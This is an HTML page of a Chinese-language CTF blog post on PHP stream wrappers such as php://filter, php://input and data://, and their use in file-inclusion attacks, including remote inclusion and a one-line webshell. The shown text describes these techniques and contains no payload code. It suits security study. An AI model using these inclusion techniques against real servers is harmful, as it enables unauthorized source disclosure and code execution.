<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><title>PHP伪协议 | WELLS Blog</title><meta name="keywords" content="CTF-Web,Web-PHP"><meta name="author" content="Wells"><meta name="copyright" content="Wells"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#f7f9fe"><meta name="mobile-web-app-capable" content="yes"><meta name="apple-touch-fullscreen" content="yes"><meta name="apple-mobile-web-app-title" content="PHP伪协议"><meta name="application-name" content="PHP伪协议"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="#f7f9fe"><meta property="og:type" content="article"><meta property="og:title" content="PHP伪协议"><meta property="og:url" content="https://we11s.github.io/posts/2344074049/index.html"><meta property="og:site_name" content="WELLS Blog"><meta property="og:description" content="常见协议与封装协议1234567891011121 file:&amp;#x2F;&amp;#x2F; — 访问本地文件系统2 http:&amp;#x2F;&amp;#x2F; — 访问 HTTP(s) 网址3 ftp:&amp;#x2F;&amp;#x2F; — 访问 FTP(s) URLs4 php:&amp;#x2F;&amp;#x2F; — 访问各个输入&amp;#x2F;输出流(I&amp;#x2F;O streams)5 zlib:&amp;#x2F;&amp;#x2F; — 压缩流6 data:"><meta property="og:locale" content="zh-CN"><meta property="og:image" content="https://we11s.github.io/img/cover/OpINusYmEzLUYYoG.jpg"><meta property="article:author" content="Wells"><meta property="article:tag"><meta name="twitter:card" content="summary"><meta name="twitter:image" content="https://we11s.github.io/img/cover/OpINusYmEzLUYYoG.jpg"><meta name="description" content="常见协议与封装协议1234567891011121 file:&amp;#x2F;&amp;#x2F; — 访问本地文件系统2 http:&amp;#x2F;&amp;#x2F; — 访问 HTTP(s) 网址3 ftp:&amp;#x2F;&amp;#x2F; — 访问 FTP(s) URLs4 php:&amp;#x2F;&amp;#x2F; — 访问各个输入&amp;#x2F;输出流(I&amp;#x2F;O streams)5 zlib:&amp;#x2F;&amp;#x2F; — 压缩流6 data:"><link rel="shortcut icon" href="/img/favicon.ico"><link rel="canonical" href="https://we11s.github.io/posts/2344074049/"><link rel="preconnect" href="//cdn.cbd.int"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta name="google-site-verification" content="xxx"/><meta name="baidu-site-verification" content="code-xxx"/><meta name="msvalidate.01" content="xxx"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.cbd.int/node-snackbar@0.1.16/dist/snackbar.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.cbd.int/@fancyapps/ui@5.0.28/dist/fancybox/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
  linkPageTop: undefined,
  peoplecanvas: undefined,
  postHeadAiDescription: undefined,
  diytitle: {"enable":true,"leaveTitle":"w(ﾟДﾟ)w人呢人呢！","backTitle":"♪(^∇^*)欢迎肥来！"},
  LA51: {"enable":"flase","ck":null,"LingQueMonitorID":null},
  greetingBox: undefined,
  twikooEnvId: '',
  commentBarrageConfig:undefined,
  root: '/',
  preloader: {"source":3},
  friends_vue_info: undefined,
  navMusic: false,
  mainTone: undefined,
  authorStatus: {"skills":["🤖️ 数码科技","🔍 脑洞大开"]},
  algolia: {"appId":"XZZFOXRZJR","apiKey":"da83ae5a0fad24bbc3e09450519a41bb","indexName":"hexo","hits":{"per_page":6},"languages":{"input_placeholder":"输入关键词后按下回车查找","hits_empty":"找不到您查询的内容：${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简","rightMenuMsgToTraditionalChinese":"转为繁体","rightMenuMsgToSimplifiedChinese":"转为简体"},
  noticeOutdate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":330},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    simplehomepage: true,
    post: false
  },
  runtime: '天',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"copy":true,"copyrightEbable":false,"limitCount":50,"languages":{"author":"作者: Wells","link":"链接: ","source":"来源: WELLS Blog","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。","copySuccess":"复制成功，复制和转载请标注本文地址"}},
  lightbox: 'fancybox',
  Snackbar: {"chs_to_cht":"你已切换为繁体","cht_to_chs":"你已切换为简体","day_to_night":"你已切换为深色模式","night_to_day":"你已切换为浅色模式","bgLight":"#425AEF","bgDark":"#1f1f1f","position":"top-center"},
  source: {
    justifiedGallery: {
      js: 'https://cdn.cbd.int/flickr-justified-gallery@2.1.2/dist/fjGallery.min.js',
      css: 'https://cdn.cbd.int/flickr-justified-gallery@2.1.2/dist/fjGallery.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: true,
  isAnchor: false,
  shortcutKey: undefined,
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  configTitle: 'WELLS Blog',
  title: 'PHP伪协议',
  postAI: '',
  pageFillDescription: '常见协议与封装协议, filex2Fx2F, httpx2Fx2F, phpx2Fx2F, phpx2Fx2Ffilter, 过滤器, 字符串过滤器, 转换过滤器, 总结：, phpx2Fx2Finput, zlibx2Fx2F, pharx2Fx2F, datax2Fx2F, 使用场景, include和require函数, include_once和require_once函数, highlight_file()和show_source(), readfile和file_get_contents和file, file_get_contents, readfile, file, file_put_contents, fopen, 文章引用, 实战, No.1 土豆哥给的题目, No.2 CTFHub 技能树-RCE-文件包含-远程包含常见协议与封装协议访问本地文件系统访问网址访问访问各个输入输出流压缩流数据查找匹配的文件路径模式归档音频流处理交互式的流访问本地文件系统条件作用用于访问本地文件系统服务器中的文件在中通常用来读取本地文件的且不受与的影响说明当指定了一个相对路径提供的路径将基于当前的目录在很多情况下是脚本所在的目录相对路径不以盘符开头的路径不以开头的路径使用示例以传参变量名为演示根目录下文件夹中文件夹下文件此处有三条当前目录下文件夹中文件夹下文件当前目录下的文件盘中文件夹中文件夹下文件盘下文件当前文件夹下文件访问网址条件作用常规形式允许通过的方法以只读访问文件或资源中通常用于远程包含使用示例以传参变量名为演示读取文件读取文件并且传入和的值访问各个输入输出流条件仅需要作用访问各个输入输出流在中经常使用的是和用于读取源码用于执行代码说明提供了一些杂项输入输出流允许访问的输入输出流标准输入输出和错误描述符内存中磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器条件可以作为一个位于原始数据流和最终目标之间的中间流来处理其他流负责对数据进行处理即读取或写入数据之前对其进行修改或过滤名称描述要过滤的数据流这个参数是必须的它指定了你要筛选过滤的数据流加绝对路径读链的筛选列表该参数可选可以设定一个或多个过滤器名称以管道符写链的筛选列表该参数可选可以设定一个或多个过滤器名称以管道符两个链的筛选列表任何没有以或作前缀的筛选器列表会视情况应用于读或写链注和指令是互斥的不能同时使用指令用于等可指定文件名的地方对这个文件进行写入后再编码处理过滤器字符串过滤器自起等同于用函数处理所有的流数据对字符串执行转换是一种简单的替换密码将字母表中的每个字母向后移动个位置同时忽略非字母表中的字符这意味着对一个字符进行编码两次会得到原始字符输出输出自起等同于用函数处理所有的流数据使用此过滤器将字符串转化为大写自起等同于用函数处理所有的流数据使用此过滤器将字符串转化为小写自起废弃使用此过滤器等同于用函数处理所有的流数据可以用两种格式接收参数一种是和函数第二个参数相似的一个包含有标记列表的字符串一种是一个包含有标记名的数组从字符串中去除和标记该函数尝试返回给定的字符串去除空字符和标记后的结果与函数该过滤器会完全去除所有的和标签无法通过参数来指定允许保留的标签进行编码防止乱码出现输出转换过滤器注转换过滤器是添加的和使用这两个过滤器等同于分别用和函数处理所有的流数据采用加密支持以一个关联数组给出的参数如果给出了输出将被用个字符为长度而截成块如果给出了每块将被用给出的字符隔开这些参数的效果和用再加上相同等同于用函数处理所有的流数据但没有和相对应的函数支持以一个关联数组给出的参数除了支持和一样的附加参数外还支持布尔参数和只支持参数作为从编码载荷中剥离的类型提示使用过滤器支持而是默认编译并启用等同于用函数处理所有的流数据将字符串按要求的字符编码来转换的使用有两种方法传入的编码格式传出的编码格式支持的字符编码有一下几种详细参考官方手册压缩过滤器虽然压缩封装协议提供了在本地文件系统中创建和兼容文件的方法但不代表可以在网络的流中提供通用压缩的意思也不代表可以将一个非压缩的流转换成一个压缩流对此压缩过滤器可以在任何时候应用于任何流资源压缩和解压实现了定义与的压缩算法过滤器可以接受以一个关联数组传递的最多三个参数定义了压缩强度数字更高通常会产生更小的载荷但要消耗更多的处理时间存在两个特殊压缩等级完全不压缩和内部默认值目前是是压缩回溯窗口大小以二的次方表示更高的值大到字节产生更好的压缩效果但消耗更多内存低的值低到字节产生产生较差的压缩效果但内存消耗低目前默认的大小是用来指示要分配多少工作内存合法的数值范围是从最小分配到最大分配内存分配仅影响速度不会影响生成的载荷的大小压缩过滤器不产生命令行工具如的头和尾信息只是压缩和解压数据流中的有效载荷部分压缩过滤器自版本起可用在激活的前提下也可以通过安装来自的包作为一个后门在版中使用此过滤器在中不可用加密过滤器已自起废弃和使用提供了对称的加密和解密这两组过滤器都支持扩展库中相同的算法格式为其中是密码的名字将被传递给有以下五个过滤器参数可用参数是否必须默认值取值举例可选可选模块的目录可选模块的目录必须典型为或字节的二进制数据根据密码而定必须典型为或字节的二进制数据根据密码而定总结常用的语句主要用来接收数据将请求中的数据作为代码执行条件使用示例以传参变量名为演示部分这一行不需要放入中压缩流条件作用均属于压缩流可以访问压缩文件中的子文件更重要的是不需要指定后缀名可修改为任意后缀等等注需要是服务器内的压缩包文件但不局限于后缀名示例压缩文件绝对路径压缩文件内的子文件名编码为压缩为压缩包重命名为并上传压缩为并上传同样支持任意后缀名压缩为并上传同样支持任意后缀名协议与类似同样可以访问格式压缩包内容例如条件作用自起可以使用数据流封装器以传递相应格式的数据通常可以用来执行代码用法加上所需传输的经过编码数据加上所需传输的经过编码再经过编码的数据传入时不要加上示例使用场景当遇到文件包含可使用伪协议进行可能遇到的文件包含函数比较常见和函数通过或语句可以将文件的内容插入另一个文件在服务器执行它之前和语句是相同的除了错误处理方面会生成致命错误并停止脚本只生成警告并且脚本会继续语法区别由于不存在使用的时候只会在当前语句报错然后执行后边的正常语句但是使用的时候就会直接报错然后跳出函数和函数语句在脚本执行期间包含并运行指定文件此行为和语句类似区别是如果该文件中的代码已经被包含了则不会再次包含只会包含一次需要查询一遍已加载的文件列表确认是否存在然后再加载这种情况下被包含两次这种情况下第二次包含时是不会进行包含的和两个函数的用法相同因为是的别名其中是可选项参数描述必需要进行高亮处理的文件的路径可选如果设置则本函数返回高亮处理的代码而不是输出它们和和三者区别名称作用把整个文件读入一个数组中读入一个文件并写入到输出缓冲将整个文件读入一个字符串注以下提到的的内置路径为在的配置文件中进行设置的搜索路径把整个文件读入一个字符串中该函数是用于把文件的内容读入到一个字符串中的首选方法如果服务器操作系统支持还会使用内存映射技术来增强性能参数描述必需规定要读取的文件可选只提供了文件名而没有提供完整的文件路径将在的内置路径中搜索文件如果您还想在在中中搜索文件的话请设置该参数为可选规定文件句柄的环境即执行的条件是一套可以修改流的行为的选项若使用则忽略可选规定在文件中开始读取的位置该参数是中新增的可选规定读取的字节数该参数是中新增的函数读取一个文件并写入到输出缓冲如果成功该函数返回从文件中读入的字节数如果失败该函数返回并附带错误信息您可以通过在函数名前面添加一个来隐藏错误输出参数描述必需规定要读取的文件可选只提供了文件名而没有提供完整的文件路径将在的内置路径中搜索文件如果您还想在在中中搜索文件的话请设置该参数为可选规定文件句柄的环境即执行的条件是一套可以修改流的行为的选项与类似不同的是将文件读取后作为一个数组返回数组中的每个单元都是文件中相应的一行包括换行符在内参数描述必需规定要读取的文件可选只提供了文件名而没有提供完整的文件路径将在的内置路径中搜索文件如果也想在中搜寻文件的话可以将该参数设为可选规定文件句柄的环境即执行的条件是一套可以修改流的行为的选项若使用则忽略函数把一个字符串写入文件中参数功能必需规定要写入数据的文件如果文件不存在则创建一个新文件必需规定要写入文件的数据可以是字符串数组或数据流可选规定如何打开写入文件可能的值只提供了文件名而没有提供完整的文件路径将在的内置路径搜索文件如果设置了该标志数据将被追加到文件末尾而不是覆盖文件内容如果设置了该标志在写入文件时会获取一个独占锁定排它锁以防止其他进程同时写入文件这可以确保在多个进程同时写入文件时不会发生冲突可选规定文件句柄的环境是一套可以修改流的行为的选项该函数访问文件时遵循以下顺序如果设置了标志函数将首先检查参数的副本是否存在于的内置路径中函数将打开文件以进行写入操作如果设置了标志函数将对文件进行锁定获取独占锁定以确保在写入文件时不会发生冲突如果设置了标志函数将将写入的数据追加到文件末尾否则函数将清除文件的内容并写入新的数据函数将写入数据到文件中函数将关闭文件并释放对文件的所有锁定函数打开一个文件或参数描述必需规定要打开的文件或必需规定您请求到该文件流的访问类型可能的值只读方式打开将文件指针指向文件头读写方式打开将文件指针指向文件头写入方式打开清除文件内容如果文件不存在则尝试创建之读写方式打开清除文件内容如果文件不存在则尝试创建之写入方式打开将文件指针指向文件末尾进行写入如果文件不存在则尝试创建之读写方式打开通过将文件指针指向文件末尾进行写入来保存文件内容创建一个新的文件并以写入方式打开如果文件已存在则返回和一个错误创建一个新的文件并以读写方式打开如果文件已存在则返回和一个错误可选如果您还想在在中中搜索文件的话请设置该参数为可选规定文件句柄的环境是一套可以修改流的行为的选项文章引用引用手册的内容原文链接可用过滤器列表引用菜鸟教程的文章原文链接引用博主的原创文章遵循版权协议原文链接引用博主的原创文章遵循版权协议原文链接实战土豆哥给的题目土豆哥一般在根目录下根本没听到做了很多无用功但偶然接触到了一句话木马题解这个正则表达式用于删除中含有地方第二个用来判断是否含有这个词如果有则进行下的内容按题目的含义我们可以构造出这个作为的替代尝试直接进行进行传参发现并没有出现参数判读估计进行了隐藏使用中的伪协议进行读取使用尝试使用加密后读取页面出现经过加密后的内容解密发现是个变量无法直接通过包含直接读出技能树文件包含远程包含页面给了个小提示题解查看题目发现题目要求必须使用非含的文件进行包含则此时可以考虑进行远程包含在服务器上建立一个文件里面写入能进行打印出根目录下的代码如最后成功获取代码',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2024-03-13 00:32:32',
  postMainColor: '',
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
      win.saveToLocal = {
        set: (key, value, ttl) => {
          if (ttl === 0) return
          const now = Date.now()
          const expiry = now + ttl * 86400000
          const item = {
            value,
            expiry
          }
          localStorage.setItem(key, JSON.stringify(item))
        },
      
        get: key => {
          const itemStr = localStorage.getItem(key)
      
          if (!itemStr) {
            return undefined
          }
          const item = JSON.parse(itemStr)
          const now = Date.now()
      
          if (now > item.expiry) {
            localStorage.removeItem(key)
            return undefined
          }
          return item.value
        }
      }
    
      win.getScript = (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        script.onerror = reject
        script.onload = script.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          script.onload = script.onreadystatechange = null
          resolve()
        }

        Object.keys(attr).forEach(key => {
          script.setAttribute(key, attr[key])
        })

        document.head.appendChild(script)
      })
    
      win.getCSS = (url, id = false) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onerror = reject
        link.onload = link.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          link.onload = link.onreadystatechange = null
          resolve()
        }
        document.head.appendChild(link)
      })
    
      win.activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#18171d')
        }
      }
      win.activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#f7f9fe')
        }
      }
      const t = saveToLocal.get('theme')
    
          const now = new Date()
          const hour = now.getHours()
          const isNight = hour <= 8 || hour >= 22
          if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
          else if (t === 'light') activateLightMode()
          else activateDarkMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
      const detectApple = () => {
        if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
          document.documentElement.classList.add('apple')
        }
      }
      detectApple()
    })(window)</script><meta name="generator" content="Hexo 7.1.1"><link rel="alternate" href="/atom.xml" title="WELLS Blog" type="application/atom+xml">
</head><body data-type="anzhiyu"><div id="web_bg"></div><div id="an_music_bg"></div><div id="loading-box" onclick="document.getElementById(&quot;loading-box&quot;).classList.add(&quot;loaded&quot;)"><div class="loading-bg"><img class="loading-img nolazyload" alt="加载头像" src="/img/avatar.jpg"/><div class="loading-image-dot"></div></div></div><script>const preloader = {
  endLoading: () => {
    document.getElementById('loading-box').classList.add("loaded");
  },
  initLoading: () => {
    document.getElementById('loading-box').classList.remove("loaded")
  }
}
window.addEventListener('load',()=> { preloader.endLoading() })
setTimeout(function(){preloader.endLoading();},10000)

if (true) {
  document.addEventListener('pjax:send', () => { preloader.initLoading() })
  document.addEventListener('pjax:complete', () => { preloader.endLoading() })
}</script><link rel="stylesheet" href="https://cdn.cbd.int/anzhiyu-theme-static@1.1.10/progress_bar/progress_bar.css"/><script async="async" src="https://cdn.cbd.int/pace-js@1.2.4/pace.min.js" data-pace-options="{ &quot;restartOnRequestAfter&quot;:false,&quot;eventLag&quot;:false}"></script><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav id="nav"><div id="nav-group"><span id="blog_name"><a id="site-name" href="/" accesskey="h"><div class="title">WELLS Blog</div><i class="anzhiyufont anzhiyu-icon-house-chimney"></i></a></span><div class="mask-name-container"><div id="name-container"><a id="page-name" href="javascript:anzhiyu.scrollToDest(0, 500)">PAGE_NAME</a></div></div><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 文章</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/archives/"><i class="anzhiyufont anzhiyu-icon-box-archive faa-tada" style="font-size: 0.9em;"></i><span> 归档</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/categories/"><i class="anzhiyufont anzhiyu-icon-shapes faa-tada" style="font-size: 0.9em;"></i><span> 分类</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/tags/"><i class="anzhiyufont anzhiyu-icon-tags faa-tada" style="font-size: 0.9em;"></i><span> 标签</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/summarize/"><i class="anzhiyufont anzhiyu-icon-list-ul faa-tada" style="font-size: 0.9em;"></i><span> 总结</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 神秘隧道</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/link/"><i class="anzhiyufont anzhiyu-icon-link faa-tada" style="font-size: 0.9em;"></i><span> 友链</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/album/"><i class="anzhiyufont anzhiyu-icon-images faa-tada" style="font-size: 0.9em;"></i><span> 相册集</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/download/"><i class="anzhiyufont anzhiyu-icon-download faa-tada" style="font-size: 0.9em;"></i><span> 下载</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 关于</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/about/"><i class="anzhiyufont anzhiyu-icon-paper-plane faa-tada" style="font-size: 0.9em;"></i><span> 关于我</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/announce/"><i class="anzhiyufont anzhiyu-icon-bullhorn faa-tada" style="font-size: 0.9em;"></i><span> 声明</span></a></li></ul></div></div></div><div id="nav-right"><div class="nav-button" id="randomPost_button"><a class="site-page" onclick="toRandomPost()" title="随机前往一个文章" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-dice"></i></a></div><div class="nav-button" id="search-button"><a class="site-page social-icon search" href="javascript:void(0);" title="搜索🔍" accesskey="s"><i class="anzhiyufont anzhiyu-icon-magnifying-glass"></i><span> 搜索</span></a></div><input id="center-console" type="checkbox"/><label class="widget" for="center-console" title="中控台" onclick="anzhiyu.switchConsole();"><i class="left"></i><i class="widget center"></i><i class="widget right"></i></label><div id="console"><div class="console-card-group-reward"><ul class="reward-all console-card"><li class="reward-item"><a href="/null" target="_blank"><img class="post-qr-code-img" src="/null"/></a><div class="post-qr-code-desc"></div></li></ul></div><div class="console-card-group"><div class="console-card-group-left"></div><div class="console-card-group-right"><div class="console-card tags"><div class="card-content"><div class="author-content-item-tips">兴趣点</div><span class="author-content-item-title">寻找你感兴趣的领域</span><div class="card-tags"><div class="item-headline"></div><div class="card-tag-cloud"><a href="/tags/CTF-Web/" style="font-size: 1.05rem;">CTF-Web<sup>14</sup></a><a href="/tags/CTF-WriteUp/" style="font-size: 1.05rem;">CTF-WriteUp<sup>3</sup></a><a href="/tags/Tools/" style="font-size: 1.05rem;">Tools<sup>1</sup></a><a href="/tags/Web-FileUpload/" style="font-size: 1.05rem;">Web-FileUpload<sup>1</sup></a><a href="/tags/Web-Middleware/" style="font-size: 1.05rem;">Web-Middleware<sup>1</sup></a><a href="/tags/Web-PHP/" style="font-size: 1.05rem;">Web-PHP<sup>2</sup></a><a href="/tags/Web-SQL/" style="font-size: 1.05rem;">Web-SQL<sup>4</sup></a><a href="/tags/Web-Unserialize/" style="font-size: 1.05rem;">Web-Unserialize<sup>1</sup></a><a href="/tags/Web-XSS/" style="font-size: 1.05rem;">Web-XSS<sup>3</sup></a><a href="/tags/%E5%BC%80%E5%8F%91/" style="font-size: 1.05rem;">开发<sup>5</sup></a></div></div><hr/></div></div><div class="console-card history"><div class="item-headline"><i class="anzhiyufont anzhiyu-icon-box-archiv"></i><span>文章</span></div><div class="card-archives"><div class="item-headline"><i class="anzhiyufont anzhiyu-icon-archive"></i><span>归档</span></div><ul class="card-archive-list"><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/03/"><span class="card-archive-list-date">三月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">6</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/02/"><span class="card-archive-list-date">二月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">5</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/01/"><span class="card-archive-list-date">一月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">3</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/12/"><span class="card-archive-list-date">十二月 2023</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">2</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/11/"><span class="card-archive-list-date">十一月 2023</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">2</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/10/"><span class="card-archive-list-date">十月 2023</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">2</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/09/"><span class="card-archive-list-date">九月 2023</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">2</span><span>篇</span></div></a></li></ul></div><hr/></div></div></div><div class="button-group"><div class="console-btn-item"><a class="darkmode_switchbutton" title="显示模式切换" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-moon"></i></a></div><div class="console-btn-item" id="consoleHideAside" onclick="anzhiyu.hideAsideBtn()" title="边栏显示控制"><a class="asideSwitch"><i class="anzhiyufont anzhiyu-icon-arrows-left-right"></i></a></div></div><div class="console-mask" onclick="anzhiyu.hideConsole()" href="javascript:void(0);"></div></div><div class="nav-button" id="nav-totop"><a class="totopbtn" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-arrow-up"></i><span id="percent" onclick="anzhiyu.scrollToDest(0,500)">0</span></a></div><div id="toggle-menu"><a class="site-page" href="javascript:void(0);" title="切换"><i class="anzhiyufont anzhiyu-icon-bars"></i></a></div></div></div></nav><div id="post-info"><div id="post-firstinfo"><div class="meta-firstline"><a class="post-meta-original">原创</a><span class="post-meta-categories"><span class="post-meta-separator"></span><i class="anzhiyufont anzhiyu-icon-inbox post-meta-icon"></i><a class="post-meta-categories" href="/categories/CTF/" itemprop="url">CTF</a></span><span class="article-meta tags"><a class="article-meta__tags" href="/tags/CTF-Web/" tabindex="-1" itemprop="url"> <span> <i class="anzhiyufont anzhiyu-icon-hashtag"></i>CTF-Web</span></a><a class="article-meta__tags" href="/tags/Web-PHP/" tabindex="-1" itemprop="url"> <span> <i class="anzhiyufont anzhiyu-icon-hashtag"></i>Web-PHP</span></a></span></div></div><h1 class="post-title" itemprop="name headline">PHP伪协议</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="anzhiyufont anzhiyu-icon-calendar-days post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" itemprop="dateCreated datePublished" datetime="2023-11-10T14:47:11.000Z" title="发表于 2023-11-10 22:47:11">2023-11-10</time><span class="post-meta-separator"></span><i class="anzhiyufont anzhiyu-icon-history post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" itemprop="dateCreated datePublished" datetime="2024-03-12T16:32:32.351Z" title="更新于 2024-03-13 00:32:32">2024-03-13</time></span></div><div class="meta-secondline"><span class="post-meta-separator"></span><span class="post-meta-wordcount"><i class="anzhiyufont anzhiyu-icon-file-word post-meta-icon" title="文章字数"></i><span class="post-meta-label" title="文章字数">字数总计:</span><span class="word-count" title="文章字数">5.4k</span><span class="post-meta-separator"></span><i class="anzhiyufont anzhiyu-icon-clock post-meta-icon" title="阅读时长"></i><span class="post-meta-label" title="阅读时长">阅读时长:</span><span>19分钟</span></span><span class="post-meta-separator"></span><span class="post-meta-pv-cv" id="" data-flag-title="PHP伪协议"><i class="anzhiyufont anzhiyu-icon-fw-eye post-meta-icon"></i><span class="post-meta-label" title="阅读量">阅读量:</span><span id="busuanzi_value_page_pv"><i class="anzhiyufont anzhiyu-icon-spinner anzhiyu-spin"></i></span></span><span class="post-meta-separator">       </span><span class="post-meta-position" title="作者IP属地为China"><i class="anzhiyufont anzhiyu-icon-location-dot"></i>China</span></div></div></div><section class="main-hero-waves-area waves-area"><svg class="waves-svg" xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M -160 44 c 30 0 58 -18 88 -18 s 58 18 88 18 s 58 -18 88 -18 s 58 18 88 18 v 44 h -352 Z"></path></defs><g class="parallax"><use href="#gentle-wave" x="48" y="0"></use><use href="#gentle-wave" x="48" y="3"></use><use href="#gentle-wave" x="48" y="5"></use><use href="#gentle-wave" x="48" y="7"></use></g></svg></section><div id="post-top-cover"><img class="nolazyload" id="post-top-bg" src="/img/cover/OpINusYmEzLUYYoG.jpg"></div></header><main id="blog-container"><div class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container" itemscope itemtype="https://we11s.github.io/posts/2344074049/"><header><a class="post-meta-categories" href="/categories/CTF/" itemprop="url">CTF</a><a href="/tags/CTF-Web/" tabindex="-1" itemprop="url">CTF-Web</a><a href="/tags/Web-PHP/" tabindex="-1" itemprop="url">Web-PHP</a><h1 id="CrawlerTitle" itemprop="name headline">PHP伪协议</h1><span itemprop="author" itemscope itemtype="http://schema.org/Person">Wells</span><time itemprop="dateCreated datePublished" datetime="2023-11-10T14:47:11.000Z" title="发表于 2023-11-10 22:47:11">2023-11-10</time><time itemprop="dateCreated datePublished" datetime="2024-03-12T16:32:32.351Z" title="更新于 2024-03-13 00:32:32">2024-03-13</time></header><h1 id="常见协议与封装协议"><a href="#常见协议与封装协议" class="headerlink" title="常见协议与封装协议"></a><strong>常见协议与封装协议</strong></h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> file:<span class="comment">// — 访问本地文件系统</span></span><br><span class="line"><span class="number">2</span> http:<span class="comment">// — 访问 HTTP(s) 网址</span></span><br><span class="line"><span class="number">3</span> ftp:<span class="comment">// — 访问 FTP(s) URLs</span></span><br><span class="line"><span class="number">4</span> php:<span class="comment">// — 访问各个输入/输出流(I/O streams)</span></span><br><span class="line"><span class="number">5</span> zlib:<span class="comment">// — 压缩流</span></span><br><span class="line"><span class="number">6</span> data:<span class="comment">// — 数据(RFC 2397)</span></span><br><span class="line"><span class="number">7</span> glob:<span class="comment">// — 查找匹配的文件路径模式</span></span><br><span class="line"><span class="number">8</span> phar:<span class="comment">// — PHP 归档</span></span><br><span class="line"><span class="number">9</span> ssh2:<span class="comment">// — Secure Shell 2</span></span><br><span 